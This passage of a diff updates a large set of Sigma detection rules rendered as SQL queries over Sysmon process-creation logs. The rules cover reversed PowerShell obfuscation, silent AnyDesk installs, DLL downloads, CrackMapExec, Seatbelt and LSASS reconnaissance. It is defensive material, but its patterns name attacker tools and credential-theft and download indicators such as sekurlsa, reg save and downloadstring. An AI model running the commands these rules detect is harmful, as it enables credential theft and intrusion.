(Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR Image LIKE '%\\\\adfind.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_execution_path_webserver.yml" + "filename": "proc_creation_win_webshell_hacking.yml" }, { - "title": "Potential PowerShell Obfuscation Via Reversed Commands", - "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", + "title": "Remote Access Tool - AnyDesk Silent Installation", + "id": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", "status": "test", - "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", + "author": "Ján Trenčanský", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unlikely" + "Legitimate deployment of AnyDesk" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--install%' ESCAPE '\\' AND CommandLine LIKE '%--start-with-win%' ESCAPE '\\' AND CommandLine LIKE '%--silent%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml" }, { - "title": "Process Creation Using Sysnative Folder", - "id": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", + "title": "Potential DLL File Download Via PowerShell Invoke-WebRequest", + "id": "0f0450f3-8b47-441e-a31b-15a91dc243e2", "status": "experimental", - "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", - "author": "Max Altgelt (Nextron Systems)", - "tags": [ - "attack.t1055" - ], + "description": "Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet", + "author": "Florian Roth (Nextron Systems), Hieu Tran", "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE 'C:\\\\Windows\\\\Sysnative\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%IWR %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%OutFile%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_sysnative.yml" + "filename": "proc_creation_win_powershell_download_dll.yml" }, { - "title": "UNC2452 PowerShell Pattern", - "id": "b7155193-8a81-4d8f-805d-88de864ca50c", + "title": "Suspicious HWP Sub Processes", + "id": "023394c4-29d5-46ab-92b8-6a534c6f447b", "status": "test", - "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports", + "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.initial_access", + "attack.t1566.001", "attack.execution", - "attack.t1059.001", - "attack.t1047" + "attack.t1203", + "attack.t1059.003", + "attack.g0032" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Invoke-WMIMethod win32\\_process -name create -argumentlist%' ESCAPE '\\' AND CommandLine LIKE '%rundll32 c:\\\\windows%' ESCAPE '\\') OR (CommandLine LIKE '%wmic /node:%' ESCAPE '\\' AND CommandLine LIKE '%process call create \"rundll32 c:\\\\windows%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND Image LIKE '%\\\\gbb.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_unc2452_ps.yml" + "filename": "proc_creation_win_hwp_exploits.yml" }, { - "title": "Schtasks From Suspicious Folders", - "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", - "status": "experimental", - "description": "Detects scheduled task creations that have suspicious action command and folder combinations", - "author": "Florian Roth (Nextron Systems)", + "title": "Uninstall Sysinternals Sysmon", + "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", + "status": "test", + "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrators might use this command to remove Sysmon for debugging purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_folder_combos.yml" + "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" }, { - "title": "Windows Binary Executed From WSL", - "id": "ed825c86-c009-4014-b413-b76003e33d35", - "status": "experimental", - "description": "Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Extrac32 Alternate Data Stream Execution", + "id": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", + "status": "test", + "description": "Extract data from cab file and hide it in an alternate data stream", + "author": "frack113", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1202" + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image REGEXP '[a-zA-Z]:\\\\' AND CurrentDirectory LIKE '%\\\\\\\\wsl.localhost%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" ], - "filename": "proc_creation_win_wsl_windows_binaries_execution.yml" + "filename": "proc_creation_win_lolbin_extrac32_ads.yml" }, { - "title": "Potential EmpireMonkey Activity", - "id": "10152a7b-b566-438f-a33c-390b607d1c8d", + "title": "Remote Access Tool - AnyDesk Piped Password Via CLI", + "id": "b1377339-fda6-477a-b455-ac0923f9ec2c", "status": "experimental", - "description": "Detects potential EmpireMonkey APT activity", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unlikely" + "Legitimate piping of the password to anydesk", + "Some FP could occur with similar tools that uses the same command line '--set-password'" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%/e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Local\\\\Temp\\\\Errors.bat%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%echo %' ESCAPE '\\' AND CommandLine LIKE '%.exe --set-password%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_empiremonkey.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml" }, { - "title": "Potential MuddyWater APT Activity", - "id": "36222790-0d43-4fe8-86e4-674b27809543", + "title": "Invoke-Obfuscation Via Use MSHTA", + "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", "status": "test", - "description": "Detects potential Muddywater APT activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.g0069" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_muddywater_activity.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "Potential Reconnaissance Activity Via GatherNetworkInfo.VBS", - "id": "575dce0c-8139-4e30-9295-1ee75969f7fe", - "status": "test", - "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", - "author": "blueteamer8699", + "title": "Add SafeBoot Keys Via Reg Utility", + "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "status": "experimental", + "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1615", - "attack.t1059.005" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Administrative activity" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR OriginalFileName IN ('cscript.exe', 'wscript.exe')) AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_gather_network_info.yml" + "filename": "proc_creation_win_reg_add_safeboot.yml" }, { - "title": "HackTool - Sliver C2 Implant Activity Pattern", - "id": "42333b2c-b425-441c-b70e-99404a17170f", + "title": "PUA - Seatbelt Execution", + "id": "38646daa-e78f-4ace-9de0-55547b2d30da", "status": "experimental", - "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.t1526", + "attack.t1087", + "attack.t1083" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumBookmarks%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumHistory%' ESCAPE '\\' OR CommandLine LIKE '% ChromiumPresence%' ESCAPE '\\' OR CommandLine LIKE '% CloudCredentials%' ESCAPE '\\' OR CommandLine LIKE '% CredEnum%' ESCAPE '\\' OR CommandLine LIKE '% CredGuard%' ESCAPE '\\' OR CommandLine LIKE '% FirefoxHistory%' ESCAPE '\\' OR CommandLine LIKE '% ProcessCreationEvents%' ESCAPE '\\')) OR ((CommandLine LIKE '% -group=misc%' ESCAPE '\\' OR CommandLine LIKE '% -group=remote%' ESCAPE '\\' OR CommandLine LIKE '% -group=chromium%' ESCAPE '\\' OR CommandLine LIKE '% -group=slack%' ESCAPE '\\' OR CommandLine LIKE '% -group=system%' ESCAPE '\\' OR CommandLine LIKE '% -group=user%' ESCAPE '\\' OR CommandLine LIKE '% -group=all%' ESCAPE '\\') AND CommandLine LIKE '% -outputfile=%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sliver_c2_execution_pattern.yml" + "filename": "proc_creation_win_pua_seatbelt.yml" }, { - "title": "Arbitrary File Download Via MSPUB.EXE", - "id": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", + "title": "Findstr LSASS", + "id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", "status": "experimental", - "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR OriginalFileName = 'MSPUB.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%lsass%' ESCAPE '\\') OR (CommandLine LIKE '% /i lsass.exe%' ESCAPE '\\' OR CommandLine LIKE '% /i \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr \"lsass%' ESCAPE '\\' OR CommandLine LIKE '%findstr.exe \"lsass%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_mspub_download.yml" + "filename": "proc_creation_win_findstr_lsass.yml" }, { - "title": "Suspicious Powercfg Execution To Change Lock Screen Timeout", - "id": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", - "status": "experimental", - "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", - "author": "frack113", + "title": "Renamed AutoHotkey.EXE Execution", + "id": "0f16d9cf-0616-45c8-8fad-becc11b5a41c", + "status": "test", + "description": "Detects execution of a renamed autohotkey.exe binary based on PE metadata fields", + "author": "Nasreddine Bencherchali", "tags": [ "attack.defense_evasion" ], @@ -16606,1216 +16225,1161 @@ ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\powercfg.exe' ESCAPE '\\' OR OriginalFileName = 'PowerCfg.exe') AND ((CommandLine LIKE '%/setacvalueindex %' ESCAPE '\\' AND CommandLine LIKE '%SCHEME\\_CURRENT%' ESCAPE '\\' AND CommandLine LIKE '%SUB\\_VIDEO%' ESCAPE '\\' AND CommandLine LIKE '%VIDEOCONLOCK%' ESCAPE '\\') OR (CommandLine LIKE '%-change %' ESCAPE '\\' AND CommandLine LIKE '%-standby-timeout-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%AutoHotkey%' ESCAPE '\\' OR Description LIKE '%AutoHotkey%' ESCAPE '\\' OR OriginalFileName IN ('AutoHotkey.exe', 'AutoHotkey.rc')) AND NOT ((Image LIKE '%\\\\AutoHotkey.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey32.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey32\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey64.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkey64\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyA32.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyA32\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU32.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU32\\_UIA.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU64.exe' ESCAPE '\\' OR Image LIKE '%\\\\AutoHotkeyU64\\_UIA.exe' ESCAPE '\\') OR Image LIKE '%\\\\AutoHotkey%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powercfg_execution.yml" + "filename": "proc_creation_win_renamed_autohotkey.yml" }, { - "title": "Whoami.EXE Execution Anomaly", - "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", - "status": "experimental", - "description": "Detects the execution of whoami.exe with suspicious parent processes.", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - CrackMapExec Execution Patterns", + "id": "058f4380-962d-40a5-afce-50207d36d7e2", + "status": "stable", + "description": "Detects various execution patterns of the CrackMapExec pentesting framework", + "author": "Thomas Patzke", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.execution", + "attack.t1047", + "attack.t1053", + "attack.t1059.003", + "attack.t1059.001", + "attack.s0106" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentImage = '') OR (ParentImage = '')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%cmd.exe /Q /c % 1> \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > \\\\%\\\\%\\\\% 2>&1' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /C % > %\\\\Temp\\\\% 2>&1' ESCAPE '\\') AND (CommandLine LIKE '%powershell.exe -exec bypass -noni -nop -w 1 -C \"%' ESCAPE '\\' OR CommandLine LIKE '%powershell.exe -noni -nop -w 1 -enc %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_parent_anomaly.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution_patterns.yml" }, { - "title": "Use NTFS Short Name in Command Line", - "id": "dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795", + "title": "Taskmgr as LOCAL_SYSTEM", + "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1036" ], "falsepositives": [ - "Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%~1.exe%' ESCAPE '\\' OR CommandLine LIKE '%~1.bat%' ESCAPE '\\' OR CommandLine LIKE '%~1.msi%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~1.dll%' ESCAPE '\\' OR CommandLine LIKE '%~1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~1.js%' ESCAPE '\\' OR CommandLine LIKE '%~1.hta%' ESCAPE '\\' OR CommandLine LIKE '%~2.exe%' ESCAPE '\\' OR CommandLine LIKE '%~2.bat%' ESCAPE '\\' OR CommandLine LIKE '%~2.msi%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~2.dll%' ESCAPE '\\' OR CommandLine LIKE '%~2.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~2.js%' ESCAPE '\\' OR CommandLine LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\xampp\\\\vcredist\\\\VCREDI~1.EXE%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_ntfs_short_name_use_cli.yml" + "filename": "proc_creation_win_taskmgr_localsystem.yml" }, { - "title": "Potential Commandline Obfuscation Using Unicode Characters", - "id": "e0552b19-5a83-4222-b141-b36184bb8d79", - "status": "test", - "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "title": "Suspicious Processes Spawned by WinRM", + "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "status": "experimental", + "description": "Detects suspicious processes including shells spawnd from WinRM host process", + "author": "Andreas Hunkeler (@Karneades), Markus Neis", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Unknown" + "Legitimate WinRM usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID 